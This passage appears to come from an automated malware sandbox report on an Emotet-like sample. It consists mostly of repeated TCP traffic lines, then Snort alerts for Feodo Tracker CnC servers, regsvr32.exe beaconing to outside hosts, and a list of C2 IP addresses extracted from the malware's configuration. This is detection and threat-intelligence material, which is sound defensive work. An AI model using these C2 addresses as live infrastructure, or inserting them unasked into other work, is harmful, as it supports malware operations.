Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49703 -> 81.68.152.197:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.63.99.23 7080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.255.211.88 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63177 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 173.255.211.88:443
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49709 -> 45.63.99.23:7080
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.3:49712 -> 182.162.143.56:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 173.255.211.88:443
Source: Malware configuration extractor IPs: 45.63.99.23:7080
Source: Malware configuration extractor IPs: 182.162.143.56:443
Source: Malware configuration extractor IPs: 91.187.140.35:8080
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 119.59.103.152:8080
Source: Malware configuration extractor IPs: 45.235.8.30:8080
Source: Malware configuration extractor IPs: 172.104.251.154:8080
Source: Malware configuration extractor IPs: 72.15.201.15:8080
Source: Malware configuration extractor IPs: 169.57.156.166:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 213.239.212.5:443
Source: Malware configuration extractor IPs: 164.90.222.65:443
Source: Malware configuration extractor IPs: 201.94.166.162:443
Source: Malware configuration extractor IPs: 94.23.45.86:4143
Source: Malware configuration extractor IPs: 183.111.227.137:8080
Source: Malware configuration extractor IPs: 186.194.240.217:443
Source: Malware configuration extractor IPs: 107.170.39.149:8080
Source: Malware configuration extractor IPs: 147.139.166.154:8080
Source: Malware configuration extractor IPs: 5.135.159.50:443
Source: Malware configuration extractor IPs: 206.189.28.199:8080
Source: Malware configuration extractor IPs: 104.168.155.143:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 82.223.21.224:8080
Source: Malware configuration extractor IPs: 103.43.75.120:443
Source: Malware configuration extractor IPs: 103.132.242.26:8080
Source: Malware configuration extractor IPs: 139.59.56.73:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 202.129.205.3:8080
Source: Malware configuration extractor IPs: 167.172.199.165:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 209.97.163.214:443
Source: Malware configuration extractor IPs: 167.172.253.162:8080
Source: Malware configuration extractor IPs: 1.234.2.232:8080
Source: Malware configuration extractor IPs: 159.65.88.10:8080
Source: Malware configuration extractor IPs: 95.217.221.146:8080
